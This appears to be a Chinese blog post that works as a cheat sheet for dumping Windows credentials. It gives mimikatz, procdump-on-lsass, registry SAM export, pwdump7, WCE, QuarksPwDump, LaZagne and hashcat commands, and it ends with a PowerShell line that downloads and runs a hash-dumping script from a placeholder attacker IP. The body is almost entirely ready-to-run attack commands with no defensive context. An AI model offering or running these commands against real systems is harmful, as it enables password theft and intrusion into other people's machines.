获取windows hash的几种方式

一、windows hash介绍

NTML  hash是指在windows系统下的Security Account Manager中保存的用户密码hash

该hash的生成方法:

将明文口令转换成十六进制的格式;

转换成Unicode格式,即在每个字节之后添加0x00;

对Unicode字符串作MD4加密,生成32位的十六进制数字串;

如测试测试密码为haha123

转成十六进制为:68616861313233

unicode转换:6800610068006100310032003300

md4加密:87ed0101e532322a4566d675f1627d30

测试环境:win7

二、windows hash值的获取

1、利用 mimikatz 获取明文密码

mimikatz下载地址:https://github.com/gentilkiwi/mimikatz/releases

根据下载文件夹中的readme

privilege::debug

sekurlsa::logonpasswords

获取的SHA1为加密后的密码,该加密字段进行md5解密即可,存在空密码的用户也会抓取到一盒哈希值,将该sha1解密后其实是个空字段

2利用 procdump & mimikatz 获取密码(推荐使用)

procdump是 Microsoft Sysinternals tools 中的工具,它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中。

procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

以管理员身份运行cmd,利用procdump导出lsass进程文件

procdump.exe -accepteula -ma lsass.exe

导出结束后利用mimikatz读出内容

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit)

3、利用 pwdump7 获取密码

下载地址:http://passwords.openwall.net/b/pwdump/pwdump7.zip

管理员权限运行cmd

获取加密后的hash,可登录网站https://www.objectif-securite.ch/ophcrack,进行解密

也可以用hashcat进行破解,具体使用可参考;https://xz.aliyun.com/t/4008

hashcat -a 3 -m 1000  --force 209C6174DA490CAEB422F3FA5A7AE634 ?l?l?l?l?l

4、利用SAMinside获取hash

SAMInside:它能从SAM注册文件中提取用户名以及密码

“导入本地用户通过任务计划”

5、wce.exe 获取hash

下载地址:https://www.ampliasecurity.com/research/windows-credentials-editor/

保存输出到文件内:wce.exe  -o output.txt

获取明文密码:wce.exe -w

6、SharpDump.exe

7、Mimikatz 调用 lsadump(推荐使用)

该方法在win7、win10 下均可适用

 使用 Reg 需要NT/SYSTEM权限 :

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save HKLM\security security.hiv

Mimikatz 调用 lsadump

lsadump::sam /system:system.hiv /sam:sam.hiv

8、QuarksPwDump工具

下载地址:https://github.com/ssssanr/QuarksPwDump-off-line

Quarkspwdump.exe -dhl

9、LaZagne

下载地址:https://github.com/AlessandroZ/LaZagne/releases/

LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序,存在linux版、windows版、mac版,LaZagne.exe可捕获的密码会全一些,可抓取浏览器、无线等相关密码,获取windows hash值。

LaZagne.exe  windows

10、powershell

一、Get-PassHashes.ps1

下载地址:https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1

使用方法:(xx.xx.xx.xx为存放shell的ip地址)

powershell IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/Get-PassHashes.ps1');Get-PassHashes

文档参考:

https://3gstudent.github.io/Windows%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81hash-NTLM-hash%E5%92%8CNet-NTLM-hash%E4%BB%8B%E7%BB%8D/

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87SAM%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8E%B7%E5%BE%97%E6%9C%AC%E5%9C%B0%E7%94%A8%E6%88%B7hash/

https://www.jianshu.com/p/7ccf6e15fbe0

  • 1
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值